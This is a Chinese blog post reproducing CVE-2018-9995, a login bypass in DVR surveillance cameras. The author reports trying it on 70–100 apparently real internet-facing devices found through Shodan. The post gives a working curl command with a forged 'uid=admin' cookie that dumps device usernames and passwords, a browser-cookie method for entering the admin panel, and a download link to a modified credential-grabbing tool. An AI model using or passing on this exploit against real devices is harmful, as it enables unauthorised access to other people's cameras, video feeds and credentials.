CVE-2018-9995漏洞复现(摄像头)

漏洞名称:

DVR Login Bypass ( CVE-2018-9995 )

经过两天的测试我对于这个漏洞已经有了深一步的了解,在测试的70~100台机器中,没有一台可以避免这个漏洞。

由于这个漏洞针对的是login.rsp特征登录页面的DVR设备,所以我们可以使用shodan进行特征搜索。

在原作者的博文中还介绍了使用谷歌进行特征匹配,按我的理解来说,在loT方面明显shodan优势更大,所以我也就不加以介绍。

我们随便选择一个ip进行它的登录页面,然后利用漏洞进行密码的获取:

 

方式一:curl构造获取

curl “http://<目标ip>:<目标ip的端口号>/device.rsp?opt=user&cmd=list” -H “Cookie: uid=admin”

例如:

上图中就会显示该系统的帐号和密码。

方式二:利用浏览器插件构造cookie进入

构造一个uid的cookie,值为admin,然后重新输入http://<目标ip>:<目标ip的端口号>,你就会发现你已经进入到了后台了,注意,此处要删除掉后面的login.rsp。

 

强力安利该浏览器插件EditThisCookie。

超级方便,顺便提一句:推荐安装谷歌和火狐两款浏览器,火狐备用,方便测试https代理劫持的时候用。

  1. 现成的利用工具

原版利用工具

这是作者使用的工具,我使用之后发现http协议头可以进行优化,以方便我们复制粘贴ip的时候更加速度,所以进行了优化。

下方提供的为优化版的文件下载

下载 “getDVR_Credentials.zip” getDVR_Credentials.zip – 已下载106次 – 2 KB

对了这款摄像头的打开需要浏览器调用exe文件,而且需要有IE认证文件,所以只能用IE浏览器打开,不然你进入后台之后是无法查看播放监控视频的。

参考:Capitan Alfa: [update] DVR Login Bypass ( CVE-2018-9995 )

为您推荐

发表评论

电子邮件地址不会被公开。 必填项已用*标注